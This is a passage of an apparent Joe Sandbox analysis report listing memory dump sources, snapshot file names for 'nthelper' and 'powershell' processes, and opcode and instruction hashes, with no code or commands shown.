                                                            • Associated: 00000005.00000002.2569001048.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000005.00000002.2569177519.0000000000402000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000005.00000002.2569266147.0000000000404000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_nthelper.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8f32582fe5cffa16d1df3f60d06aa6a26514e684bb68eb6197a6cd870405a0d4
                                                            • Instruction ID: 37283cf5fd5ade48ec6d96cf6941fcaa95a322ea8f96897c16376f9f7fb2df5f
                                                            • Opcode Fuzzy Hash: 8f32582fe5cffa16d1df3f60d06aa6a26514e684bb68eb6197a6cd870405a0d4
                                                            • Instruction Fuzzy Hash: 89F0FF61B006009EE700DBB5C4513DE3371A74478CF00057AEE0CB7B99DA38CA018794
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1651758978.00007FFE7DDE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DDE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_7ffe7dde0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                            • Instruction ID: c404d9fde1452eeff25815ef1046dddb42ebff23ba9210f8deb1415e9eedbd87
                                                            • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                            • Instruction Fuzzy Hash: E501677111CB0D4FD754EF0CE451AB6B7E0FB99364F10066EE58AC3661D636E882CB45
                                                            Memory Dump Source
                                                            • Source File: 00000012.00000002.2738563946.00007FFE7DDE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7DDE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_18_2_7ffe7dde0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                            • Instruction ID: c404d9fde1452eeff25815ef1046dddb42ebff23ba9210f8deb1415e9eedbd87
                                                            • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                            • Instruction Fuzzy Hash: E501677111CB0D4FD754EF0CE451AB6B7E0FB99364F10066EE58AC3661D636E882CB45